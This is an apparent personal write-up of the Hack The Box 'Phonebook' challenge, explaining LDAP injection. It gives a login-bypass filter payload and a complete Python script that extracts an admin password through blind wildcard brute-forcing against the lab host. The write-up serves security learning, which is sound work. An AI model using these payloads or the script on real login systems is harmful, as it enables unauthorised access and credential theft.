This post documents my process for solving the Phonebook box on Hack The Box. The box focuses on LDAP injection and brute-forcing credentials using knowledge of LDAP search/filter syntax.
Solve
I didn’t find any obvious attack vectors except for a DOM-based HTML injection. After checking a writeup, I learned the challenge was about LDAP injection—a topic I had little prior experience with.
What is LDAP Injection?
According to PayloadAllTheThings, LDAP Injection is a vulnerability that occurs when user-supplied input is used to construct LDAP queries without proper sanitization or escaping.
Hints
On the page, there are several hints:
- “You can now login using the workstation username and password”
- Title: “Phonebook - Login”
- Potential username: “reese”
These suggest the app uses LDAP for directory service.
Bypassing Login
Trying tools like nikto or dirbuster didn’t help. Similar to SQLi testing, using ( or ) can sometimes break LDAP queries. Example payload:
user = Reese)(!(&(1=0
pass = q))
This resulted in:
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
Using “Reese” (from the page) let me bypass authentication, but to fully exploit the system, more was needed.
Searching via the app’s search bar, I found:
Eimile Pantlin epantlin1c@admin.ch 690-650-9785
Trying “epantlin1c” with a similar payload worked too. Entering . in the search bar listed all possible users—likely because emails have dots.
The writeup referenced HackTricks LDAP Injection for more bypass tricks.
Blind LDAP Injection (Brute-forcing Passwords)
The main goal: discover the administrator (“Reese”) password with blind LDAP injection.
Manually, trying passwords for user “reese”:
*→ Successa*→ FailureH*→ Success
This suggests the password starts with “H”. The wildcard * functions like a match-anything character. By iteratively adding characters (e.g., H*, Ha*, Hab*), you can brute-force the password one character at a time.
Because bypassing the login doesn’t get you far, the true challenge is scripting a blind brute-force for the admin password.
Example Python Script
Script based on the writeup’s logic:
import requests
USERNAME = "reese"
LOGIN_URL = "http://83.136.255.192:56860/login"
CHARACTERS = "qwertyuiopQWERTYUIOPasdfghjklASDFGHJKLzxcvbnmZXCVBNM_-[]{}1234567890"
def trylogin(user, pw):
session = requests.Session()
headers = {
'X-Forwarded-For': pw,
'Referer': LOGIN_URL
}
data = {
"username": user,
"password": pw
}
response = session.post(LOGIN_URL, headers=headers, data=data, allow_redirects=False)
location = response.headers.get('location', '')
return '/login' not in location
def forceone(prefix):
for x in CHARACTERS:
test_pw = f"{prefix}{x}*"
if trylogin(USERNAME, test_pw):
return x
return ""
def forcer():
got = ""
while True:
next_char = forceone(got)
if not next_char:
print("No matching character found. Exiting.")
break
got += next_char
print("Discovered so far:", got)
if __name__ == "__main__":
forcer()
Lessons Learned
- LDAP injection is analogous to SQL injection but uses different operators, filters, and wildcards (
*). - Username enumeration and blind brute-force attacks can be surprisingly effective with LDAP.
- Scripting is essential for blind brute-force when each character must be discovered sequentially.
- Always check public writeups and references (like HackTricks) for injection tricks.
Writeup based on my own exploitation process, with inspiration from CTF and security community references.